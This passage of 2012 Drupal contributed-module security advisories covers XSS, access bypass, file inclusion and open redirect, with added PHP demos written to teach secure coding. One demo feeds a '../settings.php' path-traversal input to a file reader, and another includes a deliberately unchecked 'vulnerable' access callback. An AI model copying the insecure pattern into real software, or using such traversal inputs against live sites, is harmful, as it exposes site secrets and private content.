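    'admin reads ../settings.php'     => jstool_read($admin, "$root/js", '../settings.php'),
    'admin reads link.js (symlink)'   => jstool_read($admin, "$root/js", 'link.js'),
];
foreach ($cases as $case => $content) {
    printf("%-32s %s\n", $case . ':', $content === null ? 'refused' : 'served');
}

// Remove the fixture.
foreach (["$root/js/link.js", "$root/js/site.js", "$root/settings.php"] as $f) { @unlink($f); }
@rmdir("$root/js");
@rmdir($root);
```

Rejecting anything that is not equal to its own basename is simpler and more robust than trying to strip `..` sequences, and the symlink check matters because a prefix comparison on the unresolved path would pass for a link that points elsewhere.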
[Full-disclosure] [Security-news] SA-CONTRIB-2012-133 - Taxonomy Image - Cross Site Scripting (XSS) & Arbitrary PHP code execution
View online: http://drupal.org/node/1762482

* Advisory ID: DRUPAL-SA-CONTRIB-2012-133
* Project: Taxonomy Image [1] (third-party module)
* Version: 6.x
* Date: 2012-August-29
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting, Arbitrary PHP code execution

DESCRIPTION

The taxonomy_image module allows site administrators to associate images with taxonomy terms. The module did not sufficiently filter retrieval of taxonomy images, allowing users to bypass Drupal's normal file upload protections to install malicious HTML or executable code to the server.

This vulnerability is mitigated by the fact that an attacker must have the permissions "administer taxonomy" and "administer taxonomy images", and that the fix for SA-2006-006 - Drupal Core - Execution of arbitrary files in certain Apache configurations [3] should prevent code execution in typical Apache configurations.

CVE: Requested

VERSIONS AFFECTED

* Taxonomy Image 6.x-1.x versions prior to 6.x-1.7.

Drupal core is not affected. If you do not use the contributed Taxonomy Image [4] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Taxonomy Image module for Drupal 6.x, upgrade to Taxonomy Image 6.x-1.7 [5]

Also see the Taxonomy Image [6] project page.

REPORTED BY

* Chris Burgess [7]

FIXED BY

* Nancy Wichmann [8], the module maintainer
* Niklas Fiekas [9], the module maintainer
* Chris Burgess [10]

COORDINATED BY

* Greg Knaddison [11] of the Drupal Security Team
* Ivo Van Geertruyen [12] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [13].

Learn more about the Drupal Security team and their policies [14], writing secure code for Drupal [15], and securing your site [16].

[1] http://drupal.org/project/taxonomy_image
[2] http://drupal.org/security-team/risk-levels
[3] https://drupal.org/node/65409
[4] http://drupal.org/project/taxonomy_image
[5] http://drupal.org/node/1760678
[6] http://drupal.org/project/taxonomy_image
[7] http://drupal.org/user/76026
[8] http://drupal.org/user/101412
[9] http://drupal.org/user/1089248
[10] http://drupal.org/user/76026
[11] http://drupal.org/user/36762
[12] http://drupal.org/user/383424
[13] http://drupal.org/contact
[14] http://drupal.org/security-team
[15] http://drupal.org/writing-secure-code
[16] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-131 - Email Field - Access Bypass
View online: http://drupal.org/node/1762470

* Advisory ID: DRUPAL-SA-CONTRIB-2012-131
* Project: Email Field [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-August-29
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION

The email module provides a field type (CCK / FieldAPI) for storing email addresses. Furthermore, it provides a formatter to output the email address as a link to a contact form. The contact form formatter allows a site visitor to email the stored address without letting them see what that e-mail address is.

The module didn't sufficiently check access for the contact form page, allowing a site visitor to email the stored address on the entity without having access to the entity itself.

CVE: Requested

VERSIONS AFFECTED

* Email Field 6.x-1.x versions prior to 6.x-1.2.
* Email Field 7.x-1.x versions prior to 7.x-1.1.

Drupal core is not affected. If you do not use the contributed Email Field [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Email Field module for Drupal 6.x, upgrade to Email Field 6.x-1.3 [4]
* If you use the Email Field module for Drupal 7.x, upgrade to Email Field 7.x-1.2 [5]

Also see the Email Field [6] project page.

REPORTED BY

* Joachim Noreiko [7]

FIXED BY

* Joachim Noreiko [8]
* Matthias Hutterer [9] the module maintainer
* Greg Knaddison [10] of the Drupal Security Team

COORDINATED BY

* Greg Knaddison [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/email
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/email
[4] http://drupal.org/node/1761968
[5] http://drupal.org/node/1761948
[6] http://drupal.org/project/email
[7] http://drupal.org/user/107701
[8] http://drupal.org/user/107701
[9] http://drupal.org/user/59747
[10] http://drupal.org/user/36762
[11] http://drupal.org/user/36762
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-132 - Announcements - Access Bypass
View online: http://drupal.org/node/1762480

* Advisory ID: DRUPAL-SA-CONTRIB-2012-132
* Project: Announcements [1] (third-party module)
* Version: 6.x
* Date: 2012-August-29
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION

The Announcements module creates an "announcement" content type and provides both node views and block lists. The module doesn't sufficiently check node access under certain conditions.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "access announcements".

CVE: Requested

VERSIONS AFFECTED

* Announcements 6.x-1.x versions prior to 6.x-1.5.

Drupal core is not affected. If you do not use the contributed Announcements [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Announcements module for Drupal 6.x, upgrade to Announcements 6.x-1.5 [4]

Also see the Announcements [5] project page.

REPORTED BY

* Michael Hess [6] of the Drupal Security Team

FIXED BY

* Nancy Wichmann [7], the module maintainer

COORDINATED BY

* Greg Knaddison [8] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/announcements
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/announcements
[4] http://drupal.org/node/1761038
[5] http://drupal.org/project/announcements
[6] http://drupal.org/user/102818
[7] http://drupal.org/user/101412
[8] http://drupal.org/user/36762
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
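The Activism, Email Field and Announcements advisories above are the same defect seen three times: a secondary path (a campaign page, a per-node contact form, an announcement listing) serves content without asking whether the visitor may view the underlying node. The block below is an added example, not code from any of those modules. It contrasts a page callback that only checks the field has a value with one that gates on node view access first. The node and account arrays are simplified stand-ins for Drupal's objects and the sample data is constructed; node_view_access() is a minimal stand-in for Drupal's node_access('view', ...) and is an assumption of the demo. Assumes PHP 7.4 or later.

```php
<?php
// Added example, not code from the Email Field, Announcements or Activism
// modules: a per-node contact form callback that checks view access on the
// node before rendering anything. node_view_access() is a deliberately small
// stand-in for Drupal's node_access(); data below is constructed.
// Assumes PHP 7.4 or later.

/** Minimal stand-in for node_access('view', $node, $account). */
function node_view_access(array $node, array $account): bool {
    $perms = $account['permissions'];
    if (in_array('bypass node access', $perms, true)) {
        return true;
    }
    if ($node['status'] === 1) {
        return in_array('access content', $perms, true);   // published
    }
    // Unpublished: only the author, and only with the matching permission.
    return $node['uid'] === $account['uid']
        && in_array('view own unpublished content', $perms, true);
}

/** Vulnerable shape: the form is served whenever the field has a value. */
function contact_form_vulnerable(array $node, array $account): ?string {
    return $node['field_email'] !== '' ? 'contact form for node ' . $node['nid'] : null;
}

/** Fixed shape: entity access gates the form; the address itself is never shown. */
function contact_form_fixed(array $node, array $account): ?string {
    if (!node_view_access($node, $account)) {
        return null;                                           // access denied
    }
    return $node['field_email'] !== '' ? 'contact form for node ' . $node['nid'] : null;
}

// Constructed sample data: an unpublished node and an anonymous visitor.
$unpublished = ['nid' => 7, 'uid' => 2, 'status' => 0, 'field_email' => 'owner@example.org'];
$published   = ['nid' => 8, 'uid' => 2, 'status' => 1, 'field_email' => 'owner@example.org'];
$visitor     = ['uid' => 0, 'permissions' => ['access content']];
$author      = ['uid' => 2, 'permissions' => ['access content', 'view own unpublished content']];

$cases = [
    'vulnerable, visitor, unpublished' => contact_form_vulnerable($unpublished, $visitor),
    'fixed, visitor, unpublished'      => contact_form_fixed($unpublished, $visitor),
    'fixed, visitor, published'        => contact_form_fixed($published, $visitor),
    'fixed, author, unpublished'       => contact_form_fixed($unpublished, $author),
];
foreach ($cases as $case => $page) {
    printf("%-34s %s\n", $case . ':', $page === null ? 'denied' : 'served');
}
```

The rule the three advisories share: any route that exists because of an entity (its form, its image, its listing entry) inherits that entity's access control, so the check belongs in the route's access callback, not only on the entity's own view page.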
[Full-disclosure] [Security-news] SA-CONTRIB-2012-127 - Custom Publishing Options - Cross Site Scripting (XSS) Vulnerability
View online: http://drupal.org/node/1732980

* Advisory ID: DRUPAL-SA-CONTRIB-2012-127
* Project: Custom Publishing Options [1] (third-party module)
* Version: 6.x
* Date: 2012-August-15
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

The Custom Publishing Options module allows you to create custom publishing options for nodes. It allows you to add to the default options of Publish, Promote to Front Page, and Sticky. It also integrates with Views, so that your custom options can be added as a field and used to sort and filter.

The module doesn't sufficiently sanitize status labels containing HTML.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer nodes".

CVE: Requested

VERSIONS AFFECTED

* Custom Publishing Options 6.x-1.x versions prior to 6.x-1.4.

Drupal core is not affected. If you do not use the contributed Custom Publishing Options [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Custom Publishing Options module for Drupal 6.x, upgrade to Custom Publishing Options 6.x-1.5 [4]

Also see the Custom Publishing Options [5] project page.

REPORTED BY

* Publicly disclosed.

FIXED BY

* Kevin Quillen [6]

COORDINATED BY

* Greg Knaddison [7] of the Drupal Security Team
* Ivo Van Geertruyen [8] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/custom_pub
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/custom_pub
[4] http://drupal.org/node/1730766
[5] http://drupal.org/project/custom_pub
[6] http://drupal.org/user/317279
[7] http://drupal.org/user/36762
[8] http://drupal.org/user/383424
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-128 - Elegant Theme - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1733056

* Advisory ID: DRUPAL-SA-CONTRIB-2012-128
* Project: Elegant Theme [1] (third-party module)
* Version: 7.x
* Date: 2012-August-15
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

Elegant Theme is a light weight Drupal 7 theme with a modern look and feel. The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage leading to a Cross Site Scripting (XSS) vulnerability.

This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission.

CVE: Requested

VERSIONS AFFECTED

* Elegant Theme 7.x-1.x versions prior to 7.x-1.0.

Drupal core is not affected. If you do not use the contributed Elegant Theme [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Elegant Theme for Drupal 7.x, upgrade to Elegant Theme 7.x-1.1 [4]

Also see the Elegant Theme [5] project page.

REPORTED BY

* Greg Knaddison [6] of the Drupal Security Team

FIXED BY

* saran.quardz [7] the module maintainer

COORDINATED BY

* Greg Knaddison [8] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/elegant_theme
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/elegant_theme
[4] http://drupal.org/node/1722880
[5] http://drupal.org/project/elegant_theme
[6] http://drupal.org/user/36762
[7] http://drupal.org/user/1031208
[8] http://drupal.org/user/36762
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-126 - Hotblocks - Cross Site Scripting (XSS) and Denial of Service (DoS)
View online: http://drupal.org/node/1732946

* Advisory ID: DRUPAL-SA-CONTRIB-2012-126
* Project: HotBlocks [1] (third-party module)
* Version: 6.x
* Date: 2012-August-15
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting, Multiple vulnerabilities

DESCRIPTION

The Hotblocks module provides an enhanced GUI for administering blocks and block content that is intended to be simpler and more controllable for less privileged users than the default block administration tools.

Cross Site Scripting (XSS)

The module doesn't sufficiently sanitize the user input for "block names" on the module's settings page. A user could inject arbitrary scripts into pages affecting site users.

This XSS vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer hotblocks".

Denial of Service (DoS)

The hotblocks user interface also allows a user to configure one hotblock to reference itself as content, thereby creating an infinite loop and potentially rendering a site unusable.

The DoS vulnerability is mitigated by the fact that a user must have a role with the permission "administer hotblocks" or a user with said permission must have configured the site such that it allows hotblocks to be embedded in other hotblocks.

CVE: Requested

VERSIONS AFFECTED

* Hotblocks 6.x-1.x versions prior to 6.x-1.8.

Drupal core is not affected. If you do not use the contributed HotBlocks [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Hotblocks module for Drupal 6.x, upgrade to Hotblocks 6.x-1.8 [4]

Also see the HotBlocks [5] project page.

REPORTED BY

* Justin C. Klein Keane [6]

FIXED BY

* Justin Dodge [7] the module maintainer

COORDINATED BY

* Greg Knaddison [8] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/hotblocks
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/hotblocks
[4] http://drupal.org/node/1732828
[5] http://drupal.org/project/hotblocks
[6] http://drupal.org/user/302225
[7] http://drupal.org/user/238638
[8] http://drupal.org/user/36762
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-125 - Chaos tool suite (ctools) - Local File Inclusion and Cross Site Scripting (XSS)

View online: http://drupal.org/node/1719548

* Advisory ID: DRUPAL-SA-CONTRIB-2012-125
* Project: Chaos tool suite (ctools) [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-August-8
* Security risk: Critical [2]
* Exploitable from: Remote
* Vulnerability: Local File Inclusion and Cross Site Scripting

DESCRIPTION
-----------
The Chaos tool suite is primarily a set of APIs and tools to improve the developer experience.

The module doesn't sufficiently validate css import statements to confirm they only include css content appropriate to show to end users. This could allow a malicious user to add sensitive content from the site (e.g. settings.php) exposing that sensitive content to visitors of the page. It could also be used to execute a Cross Site Scripting attack.

This vulnerability is partly mitigated by the fact that an attacker must have a role with a permission to place custom CSS into a field. However, any user who can create or edit a node may have sufficient permissions to place the CSS depending on the site configuration.

CVE: Requested

VERSIONS AFFECTED
-----------------
* Chaos tool suite (ctools) 6.x-1.x versions prior to 6.x-1.9.
* Chaos tool suite (ctools) 7.x-1.x versions prior to 7.x-1.1.

Drupal core is not affected. If you do not use the contributed Chaos tool suite (ctools) [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:

* If you use the Ctools module for Drupal 6.x, upgrade to Ctools 6.x-1.9 [4]
* If you use the Ctools module for Drupal 7.x, upgrade to Ctools 7.x-1.1 [5]

Also see the Chaos tool suite (ctools) [6] project page.

REPORTED BY
-----------
* Casey [7]

FIXED BY
--------
* Tim Plunkett [8] a module maintainer
* John Morahan [9] of the Drupal Security Team

COORDINATED BY
--------------
* John Morahan [10] of the Drupal Security Team
* Heine Deelstra [11] of the Drupal Security Team
* Greg Knaddison [12] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [13].

Learn more about the Drupal Security team and their policies [14], writing secure code for Drupal [15], and securing your site [16].

[1] http://drupal.org/project/ctools
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/ctools
[4] http://drupal.org/node/1719786
[5] http://drupal.org/node/1719782
[6] http://drupal.org/project/ctools
[7] http://drupal.org/user/32403
[8] http://drupal.org/user/241634
[9] http://drupal.org/user/58170
[10] http://drupal.org/user/58170
[11] http://drupal.org/user/17943
[12] http://drupal.org/user/36762
[13] http://drupal.org/contact
[14] http://drupal.org/security-team
[15] http://drupal.org/writing-secure-code
[16] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-124 - Mime Mail - Access Bypass

View online: http://drupal.org/node/1719482

* Advisory ID: DRUPAL-SA-CONTRIB-2012-124
* Project: Mime Mail [1] (third-party module)
* Version: 6.x
* Date: 2012-August-8
* Security risk: Critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION
-----------
The MIME Mail module allows users to send MIME-encoded e-mail messages with embedded images and attachments.

The module doesn't perform proper access checks, allowing a user to send arbitrary (e.g. the settings.php) files as attachments. In the latest version users must have the "send arbitrary files" permission to access files located outside the public files directory.

CVE: Requested

VERSIONS AFFECTED
-----------------
* Mime Mail 6.x-1.x versions prior to 6.x-1.1.

Drupal core is not affected. If you do not use the contributed Mime Mail [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:

* If you use the Mime Mail module for Drupal 6.x, upgrade to Mime Mail 6.x-1.1 [4]

Also see the Mime Mail [5] project page.

REPORTED BY
-----------
* joglin [6]

FIXED BY
--------
* Jeremiah Davis [7] the module maintainer
* Gabor Seljan [8] the module maintainer

COORDINATED BY
--------------
* Greg Knaddison [9] of the Drupal Security Team
* Dave Reid [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/mimemail
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/mimemail
[4] http://drupal.org/node/1719446
[5] http://drupal.org/project/mimemail
[6] http://drupal.org/user/86464
[7] http://drupal.org/user/228997
[8] http://drupal.org/user/232117
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/53892
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-123 - Shibboleth authentication - Access Bypass

View online: http://drupal.org/node/1719462

* Advisory ID: DRUPAL-SA-CONTRIB-2012-123
* Project: Shibboleth authentication [1] (third-party module)
* Version: 6.x
* Date: 2012-August-8
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION
-----------
The Shibboleth authentication module provides user authentication with Shibboleth single sign-on systems (both v1.3 and v2.0) as well as some authorization features (automatic role assignment based on Shibboleth attributes).

The module doesn't sufficiently confirm the user's active status in Drupal when authenticating a user whose account could be blocked.

CVE: Requested

VERSIONS AFFECTED
-----------------
* Shibboleth authentication all versions prior to 6.x-4.0-rc3.

Drupal core is not affected. If you do not use the contributed Shibboleth authentication [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:

* If you use the Shibboleth authentication module for Drupal 6.x, upgrade to Shibboleth authentication 6.x-4.0 [4]

Shibboleth authentication releases for Drupal 7.x are not affected.

Also see the Shibboleth authentication [5] project page.

REPORTED BY
-----------
* Brian Swaney [6]

FIXED BY
--------
Fixed by newer releases.

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [7].

Learn more about the Drupal Security team and their policies [8], writing secure code for Drupal [9], and securing your site [10].

[1] http://drupal.org/project/shib_auth
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/shib_auth
[4] http://drupal.org/node/1332976
[5] http://drupal.org/project/shib_auth
[6] http://drupal.org/user/608968
[7] http://drupal.org/contact
[8] http://drupal.org/security-team
[9] http://drupal.org/writing-secure-code
[10] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-122 - Better Revisions - Cross Site Scripting (XSS)

View online: http://drupal.org/node/1719402

* Advisory ID: DRUPAL-SA-CONTRIB-2012-122
* Project: Better Revisions [1] (third-party module)
* Version: 7.x
* Date: 2012-August-08
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION
-----------
The Better Revisions module changes the built-in revision log text area to a customizable select list with an optional description field. It also allows an administrator to make the list and/or description field required.

The module doesn't sufficiently validate strings entered in the administration interface.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer better revisions".

CVE: Requested

VERSIONS AFFECTED
-----------------
* Better Revisions 7.x-1.x versions prior to 7.x-1.1.

Drupal core is not affected. If you do not use the contributed Better Revisions [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:

* If you use the Better Revisions module for Drupal 7.x, upgrade to Better Revisions 7.x-1.1 [4]

Also see the Better Revisions [5] project page.

REPORTED BY
-----------
* Klaus Purer [6] of the Drupal Security Team

FIXED BY
--------
* Roy Baxter [7] the module maintainer

COORDINATED BY
--------------
* Klaus Purer [8] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/better_revisions
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/better_revisions
[4] http://drupal.org/node/1713378
[5] http://drupal.org/project/better_revisions
[6] http://drupal.org/user/262198
[7] http://drupal.org/user/360394
[8] http://drupal.org/user/262198
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-121 - Shorten URLs - Cross Site Scripting (XSS)

View online: http://drupal.org/node/1719392

* Advisory ID: DRUPAL-SA-CONTRIB-2012-121
* Project: Shorten URLs [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-August-8
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION
-----------
The Shorten URLs module provides an API to shorten URLs via many services like bit.ly and TinyURL, as well as a block and a page that provide an interface for easily shortening URLs.

Cross Site Scripting via report

The module doesn't sufficiently sanitize user input when displaying shortened URLs.

This vulnerability is mitigated by several factors:

* The Record Shortened URLs submodule must be installed
* The Views module must /not/ be installed
* An attacker must either have the "use Shorten URLs page" permission or access to the Shorten URLs block

CVE: Requested

Cross Site Scripting via Custom Services List

There is an additional XSS vulnerability where the module doesn't sufficiently sanitize user input when displaying custom URL shortening services.

This vulnerability is mitigated by the fact that the "Shorten URLs Custom Services" submodule must be enabled and the attacker must have the "administer Shorten URLs custom services" permission, which should not be given to non-administrators.

CVE: Requested

VERSIONS AFFECTED
-----------------
* Shorten URLs 6.x-1.x versions prior to 6.x-1.13.
* Shorten URLs 7.x-1.x versions prior to 7.x-1.2.

Drupal core is not affected. If you do not use the contributed Shorten URLs [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:

* If you use the Shorten URLs module for Drupal 6.x, upgrade to Shorten URLs 6.x-1.13 [4]
* If you use the Shorten URLs module for Drupal 7.x, upgrade to Shorten URLs 7.x-1.2 [5]

Also see the Shorten URLs [6] project page.

REPORTED BY
-----------
* Zach Alexander [7]
* Justin Klein Keane [8]

FIXED BY
--------
* Isaac Sukin [9], the module maintainer
* Zach Alexander [10]
* Justin Klein Keane [11]

COORDINATED BY
--------------
* Stella Power [12] of the Drupal Security Team
* Greg Knaddison [13] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [14].

Learn more about the Drupal Security team and their policies [15], writing secure code for Drupal [16], and securing your site [17].

[1] http://drupal.org/project/shorten
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/shorten
[4] https://drupal.org/node/1719306
[5] https://drupal.org/node/1719310
[6] http://drupal.org/project/shorten
[7] https://drupal.org/user/1972656
[8] https://drupal.org/user/302225
[9] https://drupal.org/user/201425
[10] https://drupal.org/user/1972656
[11] https://drupal.org/user/302225
[12] http://drupal.org/user/66894
[13] http://drupal.org/user/36762
[14] http://drupal.org/contact
[15] http://drupal.org/security-team
[16] http://drupal.org/writing-secure-code
[17] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-120 - Monthly Archive by Node Type - Access Bypass (unsupported)

View online: http://drupal.org/node/1708198

* Advisory ID: DRUPAL-SA-CONTRIB-2012-120
* Project: Monthly Archive by Node Type [1] (third-party module)
* Version: 6.x
* Date: 2012-August-1
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION
-----------
This module generates a monthly archive and block for specified node types, as well as an archive and block for whichever collection of node types you specify.

The module doesn't sufficiently ensure node access for sites that use a node access system.

This vulnerability is mitigated by the fact that it only affects sites using a node_access module.

CVE: Requested

VERSIONS AFFECTED
-----------------
* All versions of the "montharchive" (Monthly Archive by Node Type [3]) module are affected.

Drupal core is not affected. If you do not use the contributed Monthly Archive by Node Type [4] module, there is nothing you need to do.

SOLUTION
--------
Remove the module; all versions of the module are affected by this vulnerability.

Also see the Monthly Archive by Node Type [5] project page.

REPORTED BY
-----------
* M Yaddoshi [6]

FIXED BY
--------
No fix was supplied.

COORDINATED BY
--------------
* Michael Hess [7] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8].

Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11].

[1] http://drupal.org/project/montharchive
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/montharchive
[4] http://drupal.org/project/montharchive
[5] http://drupal.org/project/montharchive
[6] http://drupal.org/user/150240
[7] http://drupal.org/user/102818
[8] http://drupal.org/contact
[9] http://drupal.org/security-team
[10] http://drupal.org/writing-secure-code
[11] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-119 - Excluded Users - Cross Site Scripting (XSS)

View online: http://drupal.org/node/1708058

* Advisory ID: DRUPAL-SA-CONTRIB-2012-119
* Project: Excluded Users [1] (third-party module)
* Version: 6.x
* Date: 2012-August-1
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION
-----------
Excluded Users is a helper module which allows administrators to select users to not appear in user listings.

The module displays a list of user names and email addresses without sanitizing them. In the event that someone manages to insert malicious code into a user name or email address, this might lead to an XSS attack.

This vulnerability is mitigated by the fact that the user name and email address are validated on creation by default but other user creation methods could create a vulnerability.

CVE: Requested

VERSIONS AFFECTED
-----------------
* Excluded Users 6.x-1.x versions prior to 6.x-1.1.

Drupal core is not affected. If you do not use the contributed Excluded Users [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:

* If you use the Excluded Users module for Drupal 6.x, upgrade to Excluded Users 6.x-1.1 [4]

Also see the Excluded Users [5] project page.

REPORTED BY
-----------
* Fox [6]

FIXED BY
--------
* Ricky Morse [7] the 6.x module maintainer

COORDINATED BY
--------------
* Michael Hess [8] of the Drupal Security Team
* Peter Wolanin [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/excluded_users
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/excluded_users
[4] http://drupal.org/node/1702984
[5] http://drupal.org/project/excluded_users
[6] http://drupal.org/user/426416
[7] http://drupal.org/user/37599
[8] http://drupal.org/user/102818
[9] http://drupal.org/user/49851
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-118 - Secure Login - Open Redirect

View online: http://drupal.org/node/1700594

* Advisory ID: DRUPAL-SA-CONTRIB-2012-118
* Project: Secure Login [1] (third-party module)
* Version: 7.x
* Date: 2012-July-25
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Open Redirect

DESCRIPTION
-----------
Secure Login module enables the user login and other forms to be submitted securely via HTTPS, thus preventing passwords and other private user data from being transmitted in clear text. In addition, Secure Login module by default redirects non-HTTPS GET requests for pages containing forms that it secures to the HTTPS site.

The module does not sufficiently validate that a requested path is internal to the site, allowing an attacker to disguise a malicious destination address as a GET query parameter passed to a non-HTTPS site URL.

This vulnerability is mitigated by the fact that the target site must render a form secured by Secure Login module on its 404 page, such as in a block. A default installation of Drupal 7 renders the user login block on the 404 page, and is thus vulnerable to the open redirect.

CVE: Requested

VERSIONS AFFECTED
-----------------
* Secure Login 7.x-1.x versions prior to 7.x-1.3.

Drupal core is not affected. If you do not use the contributed Secure Login [3] module, there is nothing you need to do.

